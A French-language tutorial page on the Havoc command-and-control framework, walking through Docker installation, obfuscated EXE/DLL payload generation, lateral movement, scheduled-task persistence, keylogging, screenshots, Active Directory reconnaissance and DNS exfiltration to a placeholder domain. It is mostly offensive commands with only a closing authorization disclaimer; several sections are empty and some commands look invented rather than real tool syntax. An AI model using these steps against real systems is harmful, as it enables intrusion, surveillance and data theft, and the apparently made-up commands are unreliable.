🔥 Havoc - Guide Avancé

Havoc est un framework offensif moderne destiné aux Red Teams pour orchestrer des campagnes complexes. Doté de fonctionnalités avancées, il offre des capacités uniques pour contourner les défenses et automatiser des attaques sophistiquées. 🚀

1️⃣ Pré-requis

2️⃣ Installation et Configuration de Havoc

Étape 1 : Télécharger Havoc

Clonez le dépôt officiel :

git clone https://github.com/HavocFramework/Havoc.git

Accédez au répertoire :

cd Havoc

Étape 2 : Installer les Dépendances

Mettez à jour votre système et installez Docker :


sudo apt update
sudo apt install docker docker-compose -y
            

Étape 3 : Lancer Havoc avec Docker

Construisez et exécutez Havoc dans un conteneur :


sudo docker-compose build
sudo docker-compose up -d
            

Accédez à l’interface web de Havoc :

http://localhost:4000

3️⃣ Génération de Payloads

Étape 1 : Configurer un Listener

Depuis l’interface web, configurez un listener :

Étape 2 : Générer un Payload

Générez un payload en EXE ou DLL :


generate --listener havoc_listener --format exe --output payload.exe
            

Pour des payloads obfusqués :


generate --listener havoc_listener --format dll --output obfuscated.dll --obfuscate true
            

4️⃣ Exploitation et Commandes Avancées

Démarrer une Session

Une fois le payload exécuté, interagissez avec la session active :

Déplacement Latéral

Pivotez vers d'autres machines :


lateral-movement --target  --username  --password 
            

Persistance

Ajoutez une tâche planifiée :


schtasks /create /tn "HavocTask" /tr C:\path\to\payload.exe /sc onlogon
            

5️⃣ Techniques Anti-Analyse

6️⃣ Scénarios Avancés

Scénario 1 : Capture de Données Sensibles

Récupérez des fichiers critiques sur la machine cible :


download C:\Users\User\Documents\important.docx
            

Scénario 2 : Surveillance Active

Surveillez les activités en temps réel :


screenshot
keylogger start
            

Scénario 3 : Reconnaissance Active Directory

Cartographiez l’Active Directory :


run-powershell "Get-ADUser -Filter * | Select-Object Name,LastLogonDate"
            

Scénario 4 : Exfiltration via DNS

Exfiltrez des données via des canaux DNS :


run-dns-exfil --domain exfil.mydomain.com --file sensitive_data.txt
            

7️⃣ Automatisation et Sécurisation

Scripts Automatisés


#!/bin/bash
git clone https://github.com/HavocFramework/Havoc.git
cd Havoc
sudo docker-compose up -d
            

Sécurisez votre Infrastructure

8️⃣ Sécurité et Conformité

⚠️ Important : Havoc doit être utilisé uniquement dans des environnements contrôlés et autorisés.